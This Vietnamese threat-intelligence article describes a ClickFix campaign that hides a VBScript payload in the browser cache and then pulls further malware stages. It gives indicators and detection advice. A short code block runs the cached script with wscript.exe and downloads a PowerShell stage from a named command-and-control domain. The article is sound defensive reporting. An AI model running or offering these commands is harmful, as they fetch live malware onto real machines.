Mối đe dọa

Kỹ thuật ClickFix mới: Lợi dụng bộ nhớ đệm trình duyệt để vượt giới hạn Windows

Phân tích kỹ thuật chuyên sâu về chiến dịch ClickFix mới, nơi kẻ tấn công sử dụng bộ nhớ đệm trình duyệt để lưu trữ và thực thi mã độc, vượt qua các giới hạn bảo mật của Windows.

RSS Source
RSS SourceAI Rewrite
~1 phút đọc•253 lượt xem
ClickFix Smuggles Payloads Through Browser Cache to Bypass Windows Run Limits
  • Cơ chế mới: Kẻ tấn công sử dụng kỹ thuật 'cache smuggling' để lưu trữ payload dưới dạng file ảnh giả mạo trong bộ nhớ đệm trình duyệt, thay vì tải trực tiếp từ server.
  • Vượt giới hạn: Kỹ thuật này cho phép vượt qua giới hạn 260 ký tự của hộp thoại Windows Run, giúp thực thi các đoạn mã phức tạp hơn.
  • Chuỗi tấn công: Sử dụng VBScript để tìm kiếm file trong bộ nhớ đệm, sau đó kích hoạt PowerShell để tải xuống các giai đoạn mã độc tiếp theo (GeniexLoader, GeniexRAT).
  • Khuyến nghị: Cần triển khai giám sát chặt chẽ các tiến trình con của WScript/PowerShell và kiểm soát chặt chẽ các yêu cầu sao chép/dán lệnh từ trình duyệt.

1. Bối cảnh & Tổng quan về ClickFix

ClickFix đã trở thành một kỹ thuật kỹ nghệ xã hội (social engineering) phổ biến trong hai năm qua, biến nạn nhân thành kênh phân phối mã độc cho chính hệ thống của họ. Thay vì sử dụng các tệp đính kèm độc hại truyền thống, kẻ tấn công thuyết phục người dùng thực hiện các thao tác 'khắc phục sự cố' giả mạo như xác thực CAPTCHA, cập nhật trình duyệt hoặc sửa lỗi hệ thống.

Sự nguy hiểm của ClickFix nằm ở việc nó lạm dụng các công cụ hợp lệ của hệ điều hành như PowerShell, Windows Run và Terminal. Điều này khiến người dùng cảm thấy ít nghi ngờ hơn so với việc tải xuống một tệp thực thi lạ. Theo dữ liệu từ CrowdStrike, các vụ tấn công sử dụng mồi nhử CAPTCHA giả đã tăng vọt 563% trong năm 2025.

2. Phân tích Kỹ thuật & Chuỗi Khai thác

Trong biến thể mới nhất được Microsoft Threat Intelligence phát hiện, kẻ tấn công đã nâng cấp kỹ thuật 'cache smuggling'. Thay vì tải payload trực tiếp, các trang web bị chiếm quyền điều khiển sẽ pre-fetch một script độc hại vào bộ nhớ đệm trình duyệt dưới dạng một tệp PNG giả mạo.

2.1. Cơ chế Cache Smuggling

Khi nạn nhân thực hiện lệnh copy-paste theo yêu cầu của kẻ tấn công, hệ thống sẽ thực thi nội dung đã được lưu trữ sẵn trong bộ nhớ đệm. Quy trình này bao gồm các bước sau:

  • Bước 1: Kẻ tấn công sử dụng các lỗ hổng như CVE-2026-6854 trong các plugin WordPress để chiếm quyền điều khiển website và tiêm mã ClickFix.
  • Bước 2: Script độc hại thực hiện quét thư mục profile trình duyệt (ví dụ: %LOCALAPPDATA%\Mozilla\Firefox\Profiles) để tìm kiếm các tệp có tiền tố 'f_'.
  • Bước 3: So khớp kích thước byte của tệp trong bộ nhớ đệm với giá trị mong đợi, sau đó sao chép tệp đó vào %LOCALAPPDATA%\Temp\t.vbs.
  • Bước 4: Thực thi tệp VBScript thông qua wscript.exe để bắt đầu chuỗi lây nhiễm.

2.2. Chuỗi lây nhiễm (Kill Chain)

Sau khi VBScript được thực thi, nó sẽ thực hiện các hành vi sau:

  • Thu thập thông tin: Sử dụng Windows Management Instrumentation (WMI) để thu thập thông tin hệ thống.
  • Tải payload giai đoạn 2: Kết nối tới server C2 (ví dụ: cocojambo[.]us[.]com/alfa) để tải xuống script PowerShell v.ps1.
  • Tiêm mã (Process Injection): Tải các .NET assembly vào bộ nhớ và tiêm mã vào tiến trình hợp lệ timeout.exe để đánh cắp thông tin xác thực.
# Ví dụ mô phỏng lệnh thực thi VBScript từ bộ nhớ đệm
wscript.exe %LOCALAPPDATA%\Temp\t.vbs
# PowerShell tải payload giai đoạn tiếp theo
Invoke-WebRequest -Uri 'http://cocojambo.us.com/alfa/v.ps1' -OutFile 'v.ps1'

3. Dấu hiệu Nhận biết & Bảng Chỉ số IOCs

Việc phát hiện các cuộc tấn công ClickFix đòi hỏi sự kết hợp giữa giám sát hành vi và phân tích log hệ thống. Dưới đây là các chỉ số quan trọng cần theo dõi:

Loại thực thểGiá trị / Chỉ sốMô tả tác động
CVECVE-2026-6854Lỗ hổng plugin WordPress dùng để tiêm mã ClickFix
Domain C2cocojambo[.]us[.]comServer tải payload PowerShell
Domain C2capsysnet[.]vgServer tải payload in-memory
Domain C2ciliabula[.]ccĐịa chỉ kết nối outbound
Tiến trìnhwscript.exe, timeout.exeTiến trình bị lạm dụng để thực thi và tiêm mã

4. Hướng dẫn Phát hiện (Threat Hunting)

Để phát hiện các hoạt động này trong môi trường doanh nghiệp, đội ngũ SOC cần tập trung vào các quy tắc phát hiện dựa trên hành vi của PowerShell và WScript.

  • Giám sát Registry: Theo dõi các thay đổi bất thường trong RunMRU registry key.
  • Giám sát tiến trình: Thiết lập cảnh báo khi wscript.exe hoặc powershell.exe được khởi chạy từ các thư mục tạm (Temp) hoặc thư mục profile trình duyệt.
  • Script Block Logging: Bật tính năng PowerShell Script Block Logging (Event ID 4104) để ghi lại nội dung các đoạn mã được thực thi.

5. Biện pháp Khắc phục & Khuyến nghị Phòng thủ

⚠️ Cảnh báo quan trọng: Tuyệt đối không thực hiện các lệnh sao chép từ các trang web yêu cầu xác thực CAPTCHA hoặc sửa lỗi trình duyệt. Đây là dấu hiệu nhận biết hàng đầu của ClickFix.

  • Hardening hệ thống: Triển khai chính sách Application Control để hạn chế việc thực thi các script không được phép trong thư mục người dùng.
  • Bảo mật mạng: Sử dụng các giải pháp Web Protection để chặn truy cập tới các tên miền độc hại đã biết.
  • Đào tạo nhận thức: Nâng cao nhận thức cho nhân viên về việc không bao giờ dán các lệnh lạ vào Windows Run, PowerShell hoặc Terminal theo yêu cầu từ các trang web không tin cậy.
  • Vá lỗi: Đảm bảo tất cả các plugin trên website (đặc biệt là WordPress) được cập nhật phiên bản mới nhất để ngăn chặn khai thác các lỗ hổng như CVE-2026-6854.
Tổng hợp, và phân tích kỹ thuật từ:The Hackers News
Xem bài gốc

Mạng Lưới An Ninh Mạng & Cộng Đồng

24/7 Alerts

Nhận cảnh báo 0-Day khẩn cấp, phân tích mã độc và tham gia thảo luận kỹ thuật cùng chuyên gia.

RSS Source

Ban biên tập nội dung và phân tích an ninh mạng tại ADSECVN.COM.

Bài Viết Liên Quan

Cùng chuyên mục & chủ đề